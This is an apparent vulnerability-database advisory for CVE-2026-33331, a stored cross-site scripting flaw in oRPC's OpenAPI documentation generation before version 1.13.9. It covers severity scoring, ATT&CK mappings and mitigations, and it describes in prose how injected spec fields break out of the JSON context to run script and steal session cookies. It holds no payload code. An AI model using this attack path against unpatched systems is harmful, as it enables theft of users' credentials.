CVE-2026-33331
Published: 24 March 2026
Summary
CVE-2026-33331 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Orpc Orpc. Its CVSS base score is 8.2 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 5.7th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Filters output in the generated OpenAPI documentation to prevent breakout from JSON context and execution of arbitrary JavaScript from malicious spec fields.
Validates inputs to OpenAPI specification fields like info.description to block injection of XSS payloads before documentation generation.
Remediates the stored XSS flaw by patching oRPC to version 1.13.9 or later, directly addressing the vulnerability in documentation generation.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS enables arbitrary JavaScript execution (T1059.007) in victim browsers when viewing poisoned OpenAPI docs; this directly supports drive-by compromise (T1189) of users and exploitation of the public-facing API documentation generator (T1190).
NVD Description
oRPC is an tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to version 1.13.9, a stored cross-site scripting (XSS) vulnerability exists in the OpenAPI documentation generation of orpc. If an attacker can control…
more
any field within the OpenAPI specification (such as info.description), they can break out of the JSON context and execute arbitrary JavaScript when a user views the generated API documentation. This issue has been patched in version 1.13.9.
Deeper analysisAI
CVE-2026-33331 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting oRPC, a tool for building end-to-end type-safe APIs that adhere to OpenAPI standards. In versions prior to 1.13.9, the vulnerability resides in the OpenAPI documentation generation process, where an attacker can inject malicious payloads into controllable fields of the OpenAPI specification, such as info.description. This allows breakout from the JSON context, enabling arbitrary JavaScript execution when users view the generated API documentation. The issue carries a CVSS v3.1 base score of 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N), indicating high severity due to network accessibility, low attack complexity, and significant confidentiality impact with changed scope.
The attack requires an attacker to control any field in the OpenAPI specification, which could occur if the specification is user-supplied, dynamically generated from untrusted inputs, or modified in a shared environment. A remote, unauthenticated attacker (PR:N) can exploit this by crafting a malicious OpenAPI spec that, when processed and viewed in the generated documentation, triggers JavaScript execution in the victim's browser (UI:R). Successful exploitation leads to high confidentiality impact (C:H), such as stealing session cookies, tokens, or sensitive data from the authenticated user viewing the docs, with low integrity impact (I:L) and no availability disruption (A:N).
Mitigation is available via upgrade to oRPC version 1.13.9, where the vulnerability has been patched. Official advisories and resources, including the GitHub security advisory (GHSA-7f6v-3gx7-27q8), release notes for v1.13.9, and the fixing commit (4f0efa8a1d3fa8e8317a4b03cc3945a5dfd68add), detail the resolution and recommend immediate updates for affected deployments.
Details
- CWE(s)